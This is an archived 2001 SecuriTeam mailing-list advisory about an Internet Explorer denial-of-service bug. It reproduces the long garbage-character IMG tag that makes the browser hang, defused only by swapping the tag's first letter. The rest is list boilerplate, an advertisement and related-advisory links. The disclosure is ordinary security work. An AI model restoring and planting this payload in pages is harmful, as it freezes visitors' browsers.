[NT] IE Denial of Service (Bad IMG Tag)

From: support@securiteam.com
Date: 12/14/01

Previous message: support@securiteam.com: "[NEWS] Mail Essentials Reveals Identity of First BCC Recipient"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

From: support@securiteam.com
To: list@securiteam.com
Date: Fri, 14 Dec 2001 21:51:58 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

IE Denial of Service (Bad IMG Tag)
------------------------------------------------------------------------

SUMMARY

Internet Explorer suffers from a denial-of-service vulnerability that
allows a web site administrator to cause the client to stop responding to
legitimate web requests.

DETAILS

An image tag with garbage characters in a particular order can cause the
Internet Explorer to hang, causing a denial of service attack.

The problematic tag is as follows (Note that the 'I' of IMG have been
replaced, to prevent the vulnerability from occurring):
<!mg
src=Ö×ØÙÚÛÖÉË§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×ØÙ
ÚÛÖÉË§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§
ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§ÞÓßâãäåé
âäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§ÞÓßâãäåéâäàåçê=}o
¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×Ø
ÙÚÛÖÉË§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË
§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§ÞÓßâãäå
éâäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§ÞÓßâãäåéâäàåçê=}
o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×
ØÙÚÛÖÉË§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉ
Ë§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§ÞÓßâã
äåéâäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§ÞÓßâãäåéâäàåç
ê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕ
Ö×ØÙÚÛÖÉË§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛ
ÖÉË§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§ÞÓ
ßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§ÞÓßâãäåéâä
àåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§ÞÓßâãäåéâäàåçê=}o¹¹¹
ºÖÕÖ×ØÙÚÛÖÉË§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×ØÙ
ÚÛÖÉË§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§
ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§ÞÓßâãäåé
âäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§ÞÓßâãäåéâäàåçê=}o
¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×Ø
ÙÚÛÖÉË§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË
§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§ÞÓßâãäå
éâäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§ÞÓßâãäåéâäàåçê=}
o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×
ØÙÚÛÖÉË§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉ
Ë§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§ÞÓßâã
äåéâäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§ÞÓßâãäåéâäàåç
ê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕ
Ö×ØÙÚÛÖÉË§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛ
ÖÉË§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×ØÙÚÛÖÉË§ÞÓ
ßâãäåéâäàåçê>

ADDITIONAL INFORMATION

The information has been provided by <mailto:zeno@cgisecurity.net> zeno,
and <mailto:screff@routing.org> Jeff Sampson .

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Previous message: support@securiteam.com: "[NEWS] Mail Essentials Reveals Identity of First BCC Recipient"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

[NEWS] Britcoun.org Cross Site Scripting via Wops.cgi
... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... A cross-site scripting vulnerability in the British Council is possible ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
(Securiteam)
[NT] Dinos Web Server Directory Traversal Vulnerability
... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... A vulnerability has been discovered in Dino's web server ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
(Securiteam)
[NEWS] www.myownemail.com Vulnerable to Cross Site Scripting
... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Note that the second one has been left out of an UID hash, ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
(Securiteam)
Re: Embedding graphics in Front Page
... Graphics are not embedded in web pages. ... An HTML image tag references the ... the full URL to the image, but only the relative path from the location of ... but the copy no longer resides in the web site. ...
(microsoft.public.frontpage.client)
Re: red xs
... image tag. ... Kevin Spencer ... Professional Chicken Salad Alchemist ... My web site looks fine in front page and it also looks fine when uploaded ...
(microsoft.public.frontpage.programming)